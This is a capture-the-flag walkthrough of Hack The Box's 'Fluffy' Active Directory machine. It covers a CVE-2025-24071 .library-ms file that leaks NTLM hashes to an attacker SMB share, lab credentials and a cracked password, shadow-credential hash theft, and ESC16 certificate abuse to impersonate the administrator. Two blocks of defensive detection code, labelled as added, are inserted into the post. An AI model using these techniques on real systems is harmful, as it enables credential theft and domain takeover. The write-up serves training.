
Hack The Box: Fluffy Machine Walkthrough – Easy Difficulty

By: darknite
Reading Time: 9 minutes

Introduction to Fluffy:

In this write-up, we will explore the "Fluffy" machine from Hack The Box, categorised as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Machine Information
In this scenario, similar to real-world Windows penetration tests, you begin the Fluffy machine with the following credentials: j.fleischman / J0elTHEM4n1990!.

Objective:

The goal of this walkthrough is to complete the "Fluffy" machine from Hack The Box by achieving the following objectives:

User Flag:

Initial access was gained by exploiting CVE-2025-24071 with a malicious .library-ms file delivered via SMB. The victim’s NTLMv2-SSP hash was captured with Responder and cracked using Hashcat (mode 5600), revealing prometheusx-303. Domain enumeration with BloodHound showed p.agila@fluffy.htb had GenericAll rights over Service Accounts, enabling control of winrm_svc.

Root Flag:

We escalated privileges by abusing the ca_svc account, which is a member of Service Accounts and Cert Publishers, granting it AD CS access. Using Certipy, we identified an ESC16 vulnerability, updated ca_svc’s userPrincipalName to impersonate the administrator, generated a certificate, and obtained both a TGT and the NT hash.

Enumerating the Fluffy Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sV -sC -oA initial -Pn 10.10.11.69

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/fluffy]
└──╼ $nmap -sV -sC -oA initial -Pn 10.10.11.69
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-18 02:49:59Z)
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-18T02:51:30+00:00; +4h17m24s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after:  2026-04-17T16:04:17

Analysis:

  • 53/tcp (DNS): Handles domain name resolution; check for zone transfer misconfigurations.
  • 88/tcp (Kerberos): Confirms Active Directory; use for Kerberos user enumeration or ticket attacks.
  • 139/tcp (NetBIOS-SSN): Legacy Windows file/printer sharing; enumerate shares and sessions.
  • 389/tcp (LDAP): Queryable directory service; useful for enumerating AD users, groups, and policies.
  • 445/tcp (SMB): Provides file sharing and remote management; test for SMB enumeration and null sessions.
  • 464/tcp (kpasswd5): Kerberos password change service; abusable in AS-REP roasting or password reset attacks.
  • 636/tcp (LDAPS): Encrypted LDAP; secure channel for directory queries, still useful for enumeration if authenticated.
  • 3269/tcp (GC over SSL): Global Catalog LDAP over SSL; enables cross-domain AD enumeration.

Samba Enumeration

We discovered the Samba share as shown above.

By using impacket-smbclient with the provided credentials, we were able to gain access as shown above.

There are several files saved inside the directory, but one file in particular caught my attention: Upgrade_Notice.pdf.

We proceeded to download the PDF to our local machine.

Exploitability Research


The PDF outlines the upgrade process and highlights several key vulnerabilities:

  • CVE-2025-24996 (Critical): External control of file names/paths in Windows NTLM, enabling network spoofing and possible unauthorized access.
  • CVE-2025-24071 (Critical): Windows File Explorer spoofing vulnerability where crafted .library-ms files in archives trigger SMB connections, leaking NTLM hashes without user action.
  • CVE-2025-46785 (High): Buffer over-read in Zoom Workplace Apps for Windows that allows an authenticated user to trigger network-based denial of service.
  • CVE-2025-29968 (High): Improper input validation in Microsoft AD CS leading to denial of service and potential system disruption.
  • CVE-2025-21193 (Medium): CSRF-based spoofing in Active Directory Federation Services, primarily impacting confidentiality.
  • CVE-2025-3445 (Low): Path traversal in Go library mholt/archiver, allowing crafted ZIPs to write files outside intended directories, risking data overwrite or misuse.

No other significant information appeared that we could leverage in this context.

CVE-2025-24071: Windows File Explorer SMB NTLM Disclosure


Vulnerable Code Analysis (CVE-2025-24071)

Malicious File Generation


The exploit dynamically creates an XML file with a hardcoded SMB path (\\attacker_ip\shared), which Windows automatically processes:

library_content = f"""
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip_address}\\shared</url>  <!-- Vulnerable: Triggers SMB -->
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

Manual Exploitation Process

We proceeded to exploit it manually, starting with the creation of the malicious .library-ms file.

Once the malicious .library-ms file is successfully created, it needs to be compressed into a ZIP archive.
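Because Explorer resolves the library's location as soon as the archive is unpacked or browsed, the useful place to catch this on the defending side is before the archive reaches a user. The following Python scanner is an added example, not code from the original post: it parses .library-ms XML, flags any location that references a remote host (a UNC path or a file:// URL with a host part), and walks a ZIP archive for such members. The sample archive, the 192.0.2.10 address and the member file names are constructed for the demonstration.

```python
"""
Added example: scan .library-ms files (and ZIP archives containing them) for
locations that point at a remote host, the trigger CVE-2025-24071 relies on.
The sample archive at the bottom is constructed here, not taken from any target.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"

# \\host\share... (UNC) and file://host/share... carry a host; file:///C:/... does not.
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")
FILE_URL_RE = re.compile(r"^file://([^/]+)/", re.IGNORECASE)


def remote_host(url: str) -> str:
    """Return the host a library location points at, or '' when the location is local."""
    for pattern in (UNC_RE, FILE_URL_RE):
        m = pattern.match(url)
        if m:
            return m.group(1)
    return ""


def find_remote_locations(xml_bytes: bytes) -> List[str]:
    """All <url> values in a library description that reference a remote host."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # not well-formed XML: Explorer has nothing to resolve
    hits = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # drop the {namespace} prefix
        if tag == "url" and el.text and remote_host(el.text.strip()):
            hits.append(el.text.strip())
    return hits


def scan_zip(zip_bytes: bytes) -> Dict[str, List[str]]:
    """Map each .library-ms member that has remote locations to the list of those locations."""
    findings: Dict[str, List[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".library-ms"):
                continue
            urls = find_remote_locations(zf.read(info))
            if urls:
                findings[info.filename] = urls
    return findings


def _library(url: str) -> str:
    """Minimal library description wrapping one simpleLocation url (constructed sample)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<libraryDescription xmlns="{LIBRARY_NS}">'
        "<searchConnectorDescriptionList><searchConnectorDescription>"
        f"<simpleLocation><url>{url}</url></simpleLocation>"
        "</searchConnectorDescription></searchConnectorDescriptionList>"
        "</libraryDescription>"
    )


def build_sample_zip() -> bytes:
    """Constructed archive: a benign local library, one pointing at a remote host, one unrelated file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Documents.library-ms", _library("C:\\Users\\Public\\Documents"))
        zf.writestr("Notice.library-ms", _library("\\\\192.0.2.10\\shared"))  # RFC 5737 test address
        zf.writestr("readme.txt", "plain text, ignored by the scanner")
    return buf.getvalue()


if __name__ == "__main__":
    for name, urls in scan_zip(build_sample_zip()).items():
        print(f"{name}: remote location(s) {urls}")
```

The scanner deliberately keys on the location rather than on the file extension alone: a library pointing at a local folder is legitimate and common, while any remote host inside an archive that arrived from outside the organisation is worth quarantining and logging. Running it over mail attachments or file-share uploads gives a cheap detection point that does not depend on the endpoint being patched.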

Initiate the Responder and monitor the incoming network packets for analysis.

We then uploaded malicious.zip to the victim's machine using smbclient.

We captured the NTLMv2-SSP hash and can now attempt to crack it.

Credential Recovery via Hash Cracking

The hash was successfully cracked within one minute, revealing the password: prometheusx-303.

BloodHound Active Directory Enumeration

We proceeded to enumerate the environment using BloodHound.

Analyzing BloodHound Enumeration Data

The account p.agila@fluffy.htb is a member of the Service Account Managers@fluffy.htb group, which has GenericAll permissions over the Service Accounts@fluffy.htb group. This means p.agila can fully manage members of the Service Accounts group, including adding, removing, or modifying accounts, a powerful privilege that can be leveraged for privilege escalation.

The accounts ldap_svc@fluffy.htb, ca_svc@fluffy.htb, and winrm_svc@fluffy.htb all belong to the service accounts@fluffy.htb group. They share similar privilege levels and likely support service-related operations, creating a common attack surface if an attacker compromises any one of them.

The domain hierarchy shows that authenticated users@fluffy.htb are members of everyone@fluffy.htb, with domain users inheriting from both authenticated users and users. Authenticated users also have pre-Windows 2000 and Certificate Service DCOM access. The ca_svc account belongs to domain users, service accounts, and cert publishers. While cert publishers is part of the Denied RODC Password Replication Group (blocking password replication to RODCs), it retains certificate publishing rights.

Performing a Certipy Shadow Attack on Fluffy Machine

It is also possible to add the user p.agila to the SERVICE ACCOUNTS group.

This process retrieves the NT hash, and you can repeat it for the other two users. The name winrm_svc indicates that you can access it directly through WinRM and authenticate using the hash.

The command uses Certipy to authenticate as the user winrm_svc with a captured NT hash against the domain controller DC01.fluffy.htb. By specifying both the domain controller IP and the target IP, it attempts to perform a pass-the-hash attack, enabling access without needing the plaintext password.

This data contains a substantial amount of information that requires careful analysis and processing.

I noticed the presence of the Cert Publishers group.

Retrieving the User Flag on Fluffy Machine

We can access the machine using the winrm_svc account by leveraging its NT hash.


We can read the user flag by executing the command type user.txt.

Escalate to Root Privileges Access on Fluffy Machine

Privilege Escalation:


This command leverages Certipy in combination with ntpdate to adjust the system time, targeting the user ca_svc with the specified NT hash against the domain fluffy.htb. The -stdout option directs the output to the console, and the -vulnerable flag identifies potentially exploitable accounts or services. This method facilitates pass-the-hash or Kerberos-related enumeration while accounting for time-based restrictions in the environment.

Privilege Escalation via ESC16 Misconfiguration


The Certificate Authority (CA) DC01.fluffy.htb is vulnerable to ESC16, a misconfiguration that allows abusing certificate templates for privilege escalation. While the WINRM_SVC account lacks elevated privileges, its CA access provides a path to target higher-privileged accounts, such as the administrator.

Vulnerabilities
ESC16: The disabled Security Extension leaves the system susceptible to abuse.

Remarks
ESC16 may require additional prerequisites. Refer to the official wiki for guidance.


We executed the Certipy account command to update the ca_svc account on the fluffy.htb domain. Using the credentials of p.agila@fluffy.htb (prometheusx-303) and targeting the domain controller at 10.10.11.69, we modified the account’s userPrincipalName to administrator. This modification allows the account to perform actions with elevated privileges, enabling further privilege escalation within the environment.


Using Certipy’s shadow command, we performed automated Kerberos-based credential extraction for the ca_svc account on fluffy.htb. Authenticated as p.agila@fluffy.htb (prometheusx-303) and targeting 10.10.11.69, Certipy generated a certificate and key credential, temporarily added it to ca_svc’s Key Credentials, and authenticated as ca_svc. It obtained a TGT, saved the cache to ca_svc.ccache, and retrieved the NT hash (ca0f4f9e9eb8a092addf53bb03fc98c8). Certipy then restored ca_svc’s original Key Credentials. Finally, we set KRB5CCNAME=ca_svc.ccache to enable subsequent Kerberos operations with the extracted credentials.

Using Certipy, we issued a certificate request with the req command, targeting the domain controller DC01.FLUFFY.HTB and the Certificate Authority fluffy-DC01-CA, while specifying the User template. Although we did not explicitly provide the DC host, Kerberos authentication handled the request over RPC. The Certificate Authority successfully processed the request (Request ID 15) and issued a certificate for the administrator user principal. The certificate did not include an object SID, with a note suggesting the -sid option if needed. We saved the certificate and its private key to administrator.pfx, completing the process.


The command uses Certipy to update the ca_svc account on the domain fluffy.htb. Authenticated as p.agila@fluffy.htb with the password prometheusx-303 and targeting the domain controller at 10.10.11.69, the account’s userPrincipalName is set to ca_svc@fluffy.htb. Certipy confirms that the update was successful, ensuring the ca_svc account reflects the correct user principal name for subsequent operations.
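The three steps above (rewrite ca_svc's userPrincipalName, request a certificate, put the UPN back) leave a distinctive trail in the Windows Security log when Directory Service Changes auditing and Certification Services auditing are enabled: Event 5136 for the userPrincipalName modification, Event 4887 for the issued certificate, then a second 5136 restoring the value. The Python below is an added detection example, not code from the original post or from Certipy. The event records are constructed, simplified dictionaries; the field names (SubjectUserName, ObjectDN, AttributeLDAPDisplayName, OperationType, AttributeValue, Requester, RequestId) follow the Windows event schema loosely, and OperationType is written out as "Value Added" rather than the raw %% placeholder the log uses. The helpdesk and j.doe events are constructed benign noise.

```python
"""
Added example: detect a UPN swap (ESC16 pattern) from Security-log events.
A userPrincipalName written to an object that names a different account is
flagged, then correlated with certificates issued to that account and with a
later restore of the UPN. Sample events are constructed, not real exports.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass
class Event:
    ts: datetime
    event_id: int
    fields: Dict[str, str]


def cn_of(dn: str) -> str:
    """Value of the first RDN: 'CN=ca_svc,CN=Users,DC=fluffy,DC=htb' -> 'ca_svc'."""
    return dn.split(",", 1)[0].split("=", 1)[1].strip()


def sam_of(principal: str) -> str:
    """Normalise 'FLUFFY\\ca_svc', 'ca_svc@fluffy.htb' or 'administrator' to a bare account name."""
    return principal.replace("\\", "/").rsplit("/", 1)[-1].split("@", 1)[0].lower()


def is_upn_write(ev: Event) -> bool:
    """A 5136 that adds a userPrincipalName value (a modify logs Value Deleted + Value Added)."""
    f = ev.fields
    return (ev.event_id == 5136
            and f.get("AttributeLDAPDisplayName") == "userPrincipalName"
            and f.get("OperationType") == "Value Added")


def detect_upn_swap(events: List[Event], window: timedelta = timedelta(minutes=30)) -> List[dict]:
    """Flag UPN writes whose new name belongs to another account; correlate 4887s and the restore."""
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for ev in filter(is_upn_write, events):
        account = cn_of(ev.fields["ObjectDN"]).lower()
        new_name = sam_of(ev.fields["AttributeValue"])
        if new_name == account:
            continue  # UPN agrees with the account: routine rename or a restore
        finding = {
            "account": account,
            "impersonated": new_name,
            "changed_by": sam_of(ev.fields["SubjectUserName"]),
            "changed_at": ev.ts.isoformat(),
            "cert_request_ids": [],
            "upn_restored": False,
        }
        for later in events:
            if not (ev.ts < later.ts <= ev.ts + window):
                continue
            if later.event_id == 4887 and sam_of(later.fields["Requester"]) == account:
                finding["cert_request_ids"].append(later.fields["RequestId"])
            if (is_upn_write(later)
                    and later.fields["ObjectDN"] == ev.fields["ObjectDN"]
                    and sam_of(later.fields["AttributeValue"]) == account):
                finding["upn_restored"] = True
        findings.append(finding)
    return findings


def _t(hhmm: str) -> datetime:
    return datetime.fromisoformat(f"2025-09-18T{hhmm}:00")


CA_SVC_DN = "CN=ca_svc,CN=Users,DC=fluffy,DC=htb"

# Constructed sample: the sequence from the walkthrough plus two benign events.
SAMPLE_EVENTS = [
    Event(_t("02:40"), 5136, {"SubjectUserName": "helpdesk", "ObjectDN": "CN=j.doe,CN=Users,DC=fluffy,DC=htb",
                              "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": "Value Added",
                              "AttributeValue": "j.doe@fluffy.htb"}),
    Event(_t("02:55"), 5136, {"SubjectUserName": "p.agila", "ObjectDN": CA_SVC_DN,
                              "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": "Value Added",
                              "AttributeValue": "administrator"}),
    Event(_t("02:57"), 4887, {"Requester": "FLUFFY\\ca_svc", "RequestId": "15"}),
    Event(_t("02:58"), 4887, {"Requester": "FLUFFY\\j.doe", "RequestId": "16"}),
    Event(_t("03:01"), 5136, {"SubjectUserName": "p.agila", "ObjectDN": CA_SVC_DN,
                              "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": "Value Added",
                              "AttributeValue": "ca_svc@fluffy.htb"}),
]

if __name__ == "__main__":
    for finding in detect_upn_swap(SAMPLE_EVENTS):
        print(finding)
```

The comparison of the new UPN against the object's own name is what separates this from a routine rename: a UPN that matches the account is ignored, so the restore step at 03:01 is recorded as evidence on the earlier finding rather than raised as a second alert. The same logic applies when the impersonated name is any other account, not only administrator. Detection is the fallback; the condition itself is fixed by re-enabling the security extension the CA had disabled (the szOID_NTDS_CA_SECURITY_EXT OID 1.3.6.1.4.1.311.25.2 removed from the policy module's DisableExtensionList) so that issued certificates carry the requester's SID and the KDC can enforce strong certificate mapping.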

Administrator Authentication Using Certipy


Using Certipy, the auth command was executed to authenticate as the administrator user on the domain fluffy.htb using the certificate stored in administrator.pfx. The tool identified the certificate’s SAN UPN as administrator and used it to request a Ticket Granting Ticket (TGT) from the domain controller at 10.10.11.69. The TGT was successfully obtained and saved to the credential cache file administrator.ccache. Certipy then retrieved the NT hash for administrator@fluffy.htb, which can be used for subsequent authentication or privilege escalation activities.

Remote Execution & Root Flag Retrieval


We accessed the target machine via WinRM using either the authenticated credentials or the extracted NT hash, which enabled remote command execution on the system.


We can read the root flag by executing the command type root.txt.

The post Hack The Box: Fluffy Machine Walkthrough – Easy Difficulty appeared first on Threatninja.net.
